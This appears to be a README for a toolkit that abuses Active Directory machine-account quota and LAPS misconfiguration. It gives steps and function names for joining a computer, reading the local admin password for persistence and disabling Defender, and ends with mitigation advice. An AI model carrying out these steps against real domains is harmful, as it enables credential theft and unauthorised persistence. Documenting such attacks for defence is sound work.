Abusing Laps Toolkit
Introduction
If the ms-DS-Machine-Account-Quota
attribute value is default and there is no delegation about domain join permissions to add computer to Active Directory , a domain user can add computer account to domain using the ms-ds-machine-account-quota
attribute . The domain user reads password (ms-mcs-admpwd
) of local administrator user for the added host after LAPS is installed and uses the password for persistence. When setting up LAPS, only certain users are assigned password reading permission. However, the user obtains All extended rights
over the added computer so that reads LAPS password. The user can bypass GPO restrictions obtaining password of local admin user, even after the user no longer has local Administrator privileges on a machine. For example, user can edit registry settings or add own account to local administrators group after GPO which removes undefined users from local administrators group.
- Open non-domain joined Windows virtual machine.
- Download LAPS.x64.msi and install it with powershell module extension (AdmPwd.PS)
- Import AdmPwd.PS
-
Import-Module AdmPwd.PS
- Add computer to Active Directory with domain user creds:
-
Add-ComputerToDomainWithUserRights
- Read local admin password and determine password policy:
-
If you are still a member of local administrators after updating GPO.
Read ms-mcs-admpwd attribute via PowerView.ps1:Get-LapsLocalAdminPassword -disableDefender
-
If you are not a member of local administrators after updating GPO.
Read ms-mcs-admpwd attribute via AdmPwd.PS:Get-LapsAdmPwd -LapsInstalled
-
Mitigation
Microsoft LAPS installation document is updated. So you can make configuration according to Microsoft LAPS_OperationsGuide.docx and LAPS_TechnicalSpecification documents. https://www.microsoft.com/en-us/download/confirmation.aspx?id=46899 If Laps Administrator Password Solution is used, set ms-ds-machine-account-quota as "0" or delegation must be applied a user group for adding computer to domain. Otherwise user can add computer to domain and read local admin user password, define password complexity via LAPS misconfiguration.